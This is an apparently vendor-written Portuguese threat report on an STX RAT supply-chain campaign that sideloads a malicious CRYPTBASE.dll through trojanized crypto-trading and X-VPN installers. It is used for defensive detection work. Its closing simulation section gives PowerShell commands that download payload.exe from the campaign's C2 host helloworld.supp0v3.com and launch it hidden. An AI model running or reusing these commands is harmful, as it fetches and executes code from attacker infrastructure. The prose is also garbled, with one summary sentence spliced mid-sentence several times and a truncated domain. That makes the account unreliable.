De Carteiras Cripto a um VPN com 100 Milhões de Usuários: Dentro de uma Campanha de Cadeia de Suprimentos do STX RAT Ativa
Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Pesquisadores descobriram uma campanha ativa de cadeia de suprimentos na qual um ator de ameaça abusou do carregamento de DLL com um CRYPTBASE.dll malicioso para implantar o trojan de acesso remoto STX RAT por meio de instaladores trojanizados para software de negociação de criptomoedas e o cliente X-VPN. A operação confiava em um único repositório Bitbucket para distribuir os pacotes infectados e rotacionava domínios de comando e controle sob o domínio root supp0v3.com. Ao mirar tanto nos usuários de ferramentas de troca financeira quanto em um serviço de VPN amplamente utilizado, os atacantes se posicionaram para roubar credenciais e outros dados sensíveis em escala. O conteúdo de detecção foi atualizado para cobrir o método de carregamento compartilhado e a infraestrutura comum. root. By targeting both users of financial exchange tools and a widely used VPN service, the attackers positioned themselves to steal credentials and other sensitive data at scale. Detection content was updated to cover the shared sideloading method and the common infrastructure.
Investigação
Analistas identificaram 11 pacotes maliciosos que todos usaram a mesma CRYPTBASE.dll cadeia de carregamento para carregar o STX RAT diretamente na memória. Os instaladores trojanizados estavam hospedados em um repositório Bitbucket chamado amos-trading, e os metadados de commit vinculavam a atividade ao pseudônimo Leda Elacoate. Após a exposição pública, os operadores rotacionaram a infraestrutura de helloworld.supp0v3.com to parapara
. A análise YARA confirmou que o STX RAT era a carga final em cada amostra examinada.
X-VPN solucionou o problema na versão Windows 77.5.3, que impõe carregamento estrito de DLL a partir de diretórios do sistema, realiza validação de hash de DLL no início e aplica políticas de carregamento por processo. Bloquear domínio root supp0v3.com. Ao mirar tanto nos usuários de ferramentas de troca financeira quanto em um serviço de VPN amplamente utilizado, os atacantes se posicionaram para roubar credenciais e outros dados sensíveis em escala. O conteúdo de detecção foi atualizado para cobrir o método de carregamento compartilhado e a infraestrutura comum. e seus subdomínios no perímetro da rede pode interromper o tráfego de comando e controle. As organizações também devem reforçar a higiene de download de software e limitar as instalações a fontes de fornecedores verificadas.
Resposta
Os defensores devem alertar sobre qualquer processo que carregue CRYPTBASE.dll de um caminho não-sistêmico e investigar sinais de execução do STX RAT na memória. A regra STX RAT YARA publicada deve ser implantada em plataformas EDR, e o tráfego outbound HTTPS para domínio root supp0v3.com. Ao mirar tanto nos usuários de ferramentas de troca financeira quanto em um serviço de VPN amplamente utilizado, os atacantes se posicionaram para roubar credenciais e outros dados sensíveis em escala. O conteúdo de detecção foi atualizado para cobrir o método de carregamento compartilhado e a infraestrutura comum. deve ser monitorado de perto. Todos os endpoints devem ser atualizados para a versão corrigida do X-VPN ou ter o software vulnerável removido. A caçada de ameaças deve também se concentrar no comportamento de carregamento de código reflexivo associado à cadeia de descompactação multiestágio do malware.
"graph TB %% Class definitions classDef technique fill:#ffcc99 classDef malware fill:#ff9999 classDef file fill:#ccccff classDef operator fill:#ff9900 %% Node definitions tech_supply_chain["<b>Technique</b> – <b>T1195.002 Comprometimento da Cadeia de Suprimentos: Comprometer a Cadeia de Suprimentos de Software</b><br/><b>Descrição</b>: atacante injetou CRYPTBASE.dll malicioso em instaladores legítimos hospedados em um repositório Bitbucket."] class tech_supply_chain technique dll_cryptbase["<b>File</b> – <b>Nome</b>: CRYPTBASE.dll (malicioso)"] class dll_cryptbase file file_installer["<b>File</b> – <b>Nome</b>: Instalador Trojanizado (e.g., Xu2011VPN, Binance, MEXC)"] class file_installer file tech_user_exec["<b>Technique</b> – <b>T1204.002 Execução do Usuário: Arquivo Malicioso</b><br/><b>Descrição</b>: vítimas baixam e executam o instalador trojanizado."] class tech_user_exec technique tech_masquerade["<b>Technique</b> – <b>T1036.008 Mascaramento: Mascarar Tipo de Arquivo</b><br/><b>Descrição</b>: pacote malicioso é apresentado como um instalador legítimo de VPN ou de troca de criptomoedas."] class tech_masquerade technique tech_dll_hijack["<b>Technique</b> – <b>T1574.001 Seqüestro do Fluxo de Execução: DLL</b><br/><b>Descrição</b>: o instalador carrega o CRYPTBASE.dll colocado no diretório do programa, fazendo a aplicação legítima carregar a DLL maliciosa."] class tech_dll_hijack technique tech_path_intercept["<b>Technique</b> – <b>T1574.008 Interceptação de Caminho: Seqüestro de Ordem de Busca</b><br/><b>Descrição</b>: ordem de busca de DLL do Windows carrega a DLL do atacante antes da cópia do sistema."] class tech_path_intercept technique tech_reflective["<b>Technique</b> – <b>T1620 Carregamento de Código Reflexivo</b><br/><b>Descrição</b>: a DLL maliciosa descompacta e injeta o payload STX RAT na memória usando o carregamento reflexivo, não deixando artefatos no disco."] class tech_reflective technique tech_embedded["<b>Technique</b> – <b>T1027.009 Payloads Embutidos</b><br/><b>Descrição</b>: a DLL contém uma cadeia de descompactação em múltiplos estágios embutida e o núcleo STX RAT."] class tech_embedded technique malware_STX["<b>Malware</b> – <b>Nome</b>: STX RAT<br/><b>Função</b>: trojan de acesso remoto fornecendo roubo de credenciais e exfiltração de dados."] class malware_STX malware tech_c2["<b>Technique</b> – <b>T1071.001 Protocolo de Camada de Aplicação: Protocolos Web</b><br/><b>Descrição</b>: o RAT se comunica com o C2 sobre HTTPS para subdomínios de supp0v3.com."] class tech_c2 technique tech_cred_browser["<b>Technique</b> – <b>T1555.003 Credenciais de Navegadores Web</b><br/><b>Descrição</b>: STX RAT coleta credenciais salvas do navegador, tokens de sessão e dados de contas do sistema."] class tech_cred_browser technique tech_exfil["<b>Technique</b> – <b>T1041 Exfiltração Sobre Canal C2</b><br/><b>Descrição</b>: credenciais coletadas e dados do sistema são exfiltrados via o mesmo canal C2 HTTPS."] class tech_exfil technique %% Connections tech_supply_chain –>|injeta| dll_cryptbase dll_cryptbase –>|colocado em| file_installer file_installer –>|baixado e executado pela vítima| tech_user_exec tech_user_exec –>|leva a| tech_masquerade tech_masquerade –>|permite| tech_dll_hijack tech_dll_hijack –>|usa| tech_path_intercept tech_path_intercept –>|permite| tech_reflective tech_reflective –>|carrega| malware_STX malware_STX –>|usa| tech_embedded malware_STX –>|comunica-se via| tech_c2 malware_STX –>|coleta| tech_cred_browser tech_cred_browser –>|dados exfiltrados via| tech_exfil "
Fluxo de Ataque
Detecções
Possível Infiltração / Exfiltração de Dados / C2 via Serviços / Ferramentas de Terceiros (via proxy)
Ver
IOCs (HashSha256) para detectar: De Carteiras Cripto a um VPN de 100 milhões de Usuários: Dentro de uma Campanha Ativa de Cadeia de Suprimentos STX RAT
Ver
Detecção da Infraestrutura C2 de Supp0v3.com na Campanha STX RAT [Conexão de Rede Windows]
Ver
Detecção de Carregamento de CRYPTBASE.dll para Implantar STX RAT [Criação de Processos Windows]
Ver
Execução de Simulação
Pré-requisito: O Check pré-voo do Telemetria & Baseline deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.
-
Narrativa de Ataque & Comandos:
Um atacante que comprometeu uma conta de usuário de baixo privilégio usa uma linha única de PowerShell para baixar uma carga maliciosa do servidor C2
helloworld.supp0v3.com. Isso utiliza T1071.001 (C2 via protocolo Web) e T1204.002 (execução do usuário) enquanto a carga em si é ofuscada (T1027, T1027.009) e mascarada como um executável legítimo (T1036.005/008). A conexão de saída para o domínio malicioso deve ser capturada pelo log do firewall e, consequentemente, disparar a regra Sigma.# Baixar carga maliciosa do domínio C2 do Supp0v3 $url = "http://helloworld.supp0v3.com/payload.exe" $out = "$env:TEMPpayload.exe" Invoke-WebRequest -Uri $url -UseBasicParsing -OutFile $out # Executar a carga (simulada – na verdade, apenas cria um arquivo fictício) Start-Process -FilePath $out -WindowStyle Hidden -
Script de Teste de Regressão:
# TC-20260609-A1B2C – Simular conexão C2 RAT STX para helloworld.supp0v3.com try { # Passo 1: Preparar carga fictícia (evitar execução real de malware) $payloadPath = "$env:TEMPpayload.exe" Set-Content -Path $payloadPath -Value "Este é um executável fictício para teste." -Encoding ASCII # Passo 2: Simular pedido HTTP de saída para domínio malicioso $c2Url = "http://helloworld.supp0v3.com/payload.exe" Invoke-WebRequest -Uri $c2Url -UseBasicParsing -OutFile $payloadPath # Passo 3: "Executar" a carga (nenhuma execução real por segurança) Write-Host "Execução simulada da carga em $payloadPath" Write-Host "Simulação concluída – verifique SIEM para alerta." } catch { Write-Error "Falha na simulação: $_" } -
Comandos de Limpeza:
# Remover a carga fictícia e quaisquer arquivos residuais $payloadPath = "$env:TEMPpayload.exe" if (Test-Path $payloadPath) { Remove-Item -Path $payloadPath -Force Write-Host "Arquivo de carga limpo." } else { Write-Host "Nenhum arquivo de carga encontrado – nada para limpar." }